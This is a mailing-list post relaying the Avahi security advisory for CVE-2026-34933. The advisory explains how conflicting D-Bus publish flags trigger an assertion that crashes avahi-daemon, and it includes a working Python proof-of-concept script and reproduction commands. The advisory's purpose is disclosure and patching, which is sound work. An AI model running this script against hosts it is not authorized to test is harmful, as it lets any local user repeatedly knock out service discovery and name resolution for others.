[<prev] [next>] [day] [month] [year] [list]
Message-ID: <36063a73-4e8a-4e9e-9385-39e908d539a0@oracle.com>
Date: Sat, 11 Apr 2026 09:56:29 -0700
From: Alan Coopersmith <alan.coopersmith@...cle.com>
To: oss-security@...ts.openwall.com
Subject: Avahi: Reachable assertion in
transport_flags_from_domain (CVE-2026-34933)
https://github.com/avahi/avahi/security/advisories/GHSA-w65r-6gxh-vhvc advises:
> Reachable assertion in transport_flags_from_domain (CVE-2026-34933)
>
> Moderate
> evverx published GHSA-w65r-6gxh-vhvc Apr 1, 2026
>
> Affected versions: <=v0.9-rc3
> Patched versions: v0.9-rc4
>
> Description
> -----------
> In all versions up to and including 0.8 and 0.9-rc3, any unprivileged local
> user can crash avahi-daemon by sending a single D-Bus method call with
> conflicting publish flags.
>
> The AVAHI_PUBLISH_USE_MULTICAST (0x100) and AVAHI_PUBLISH_USE_WIDE_AREA (0x80)
> flags are individually accepted by the AVAHI_FLAGS_VALID() validation macro at
> entry.c:201-209 (for AddRecord) and entry.c:593-597 (for AddService), since
> both are listed in the allowed flags bitmask. However, these flags are mutually
> exclusive, and the function transport_flags_from_domain() at entry.c:57 enforces
> this exclusivity with an assert():
>
> static void transport_flags_from_domain(AvahiServer *s, AvahiPublishFlags *flags, const char *domain) {
> assert(flags);
> assert(domain);
>
> assert(!((*flags & AVAHI_PUBLISH_USE_MULTICAST) && (*flags & AVAHI_PUBLISH_USE_WIDE_AREA)));
> // ...
> }
>
> When both flags are set simultaneously (flags = 0x180), the assertion fails,
> causing the daemon to abort with SIGABRT. The D-Bus system bus policy
> (avahi-dbus.conf) allows any local user to call EntryGroupNew and AddService
> without restrictions.
>
> Root cause
> ----------
> The flags validation (AVAHI_FLAGS_VALID) and the mutual exclusivity check
> (assert in transport_flags_from_domain) are performed at different layers
> with no coordination:
>
> 1. AVAHI_FLAGS_VALID(flags, mask) checks !(flags & ~mask) -- it verifies that
> no unknown bits are set, but does not check for mutually exclusive
> combinations.
> 2. transport_flags_from_domain() enforces mutual exclusivity via assert(),
> which is a fatal operation in a production daemon.
>
> Affected D-Bus methods
> ----------------------
> The following D-Bus methods on org.freedesktop.Avahi.EntryGroup accept a flags
> parameter that reaches the vulnerable function:
>
> Method D-Bus handler Core function
> AddService dbus-entry-group.c:166 server_add_service_strlst_nocopy()
> -> transport_flags_from_domain()
> AddServiceSubtype dbus-entry-group.c:213 server_add_service_strlst_nocopy()
> -> transport_flags_from_domain()
> AddAddress dbus-entry-group.c:280 avahi_server_add_address()
> -> transport_flags_from_domain()
> AddRecord dbus-entry-group.c:311 avahi_server_add()
> -> server_add_internal()
> -> transport_flags_from_domain()
> UpdateServiceTxt dbus-entry-group.c:370 server_update_service_txt_strlst_nocopy()
> -> transport_flags_from_domain()
>
> Proof of Concept
> ----------------
>
> #!/usr/bin/env python3
> """Any local unprivileged user can crash avahi-daemon with this script."""
> import dbus
>
> AVAHI_PUBLISH_USE_WIDE_AREA = 128 # 0x80
> AVAHI_PUBLISH_USE_MULTICAST = 256 # 0x100
> CONFLICTING_FLAGS = AVAHI_PUBLISH_USE_WIDE_AREA | AVAHI_PUBLISH_USE_MULTICAST
>
> bus = dbus.SystemBus()
> server = dbus.Interface(
> bus.get_object('org.freedesktop.Avahi', '/'),
> 'org.freedesktop.Avahi.Server'
> )
>
> # Create an entry group
> eg_path = server.EntryGroupNew()
> eg = dbus.Interface(
> bus.get_object('org.freedesktop.Avahi', eg_path),
> 'org.freedesktop.Avahi.EntryGroup'
> )
>
> # Trigger the crash: AddService with both MULTICAST and WIDE_AREA flags
> eg.AddService(
> dbus.Int32(-1), # interface (AVAHI_IF_UNSPEC)
> dbus.Int32(-1), # protocol (AVAHI_PROTO_UNSPEC)
> dbus.UInt32(CONFLICTING_FLAGS), # flags = 0x180 (CRASH)
> dbus.String("PoC-Service"), # name
> dbus.String("_http._tcp"), # type
> dbus.String(""), # domain
> dbus.String(""), # host
> dbus.UInt16(8080), # port
> dbus.Array([], signature='ay') # TXT records
> )
>
> Reproduction
> ------------
>
> # On any Linux system with avahi-daemon running:
> apt install python3-dbus # if not already installed
> python3 poc.py
>
> # Verify crash:
> systemctl status avahi-daemon
> # Expected: "avahi-daemon.service: Main process exited, code=exited, status=134/n/a"
>
> journalctl -u avahi-daemon -n 5
> # Expected: "entry.c:57: transport_flags_from_domain: Assertion
> # `!((*flags & AVAHI_PUBLISH_USE_MULTICAST) && (*flags & AVAHI_PUBLISH_USE_WIDE_AREA))' failed."
>
> Impact
> ------
>
> * Any unprivileged local user can immediately crash the avahi-daemon process.
> * All mDNS/DNS-SD services on the host become unavailable.
> * Applications relying on nss-mdns for .local hostname resolution fail.
> * Network service discovery (printers, Chromecast, AirPlay, etc.) stops.
> * While systemd auto-restarts the daemon, repeated crashes cause a persistent
> DoS.
>
> Credit
> ------
> Discovered by Guillaume MEUNIER - Head of VOC France - Orange Cyberdefense on
> 2026-03-10.
>
> Fix
> ---
> It was addressed in <https://github.com/avahi/avahi/pull/891>.
>
> Severity: Moderate - 5.5 / 10
> CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
> CVE ID: CVE-2026-34933
> Weakness: CWE-617
--
-Alan Coopersmith- alan.coopersmith@...cle.com
Oracle Solaris Engineering - https://blogs.oracle.com/solaris
Powered by blists - more mailing lists
Please check out the
Open Source Software Security Wiki, which is counterpart to this
mailing list.
Confused about mailing lists and their use?
Read about mailing lists on Wikipedia
and check out these
guidelines on proper formatting of your messages.
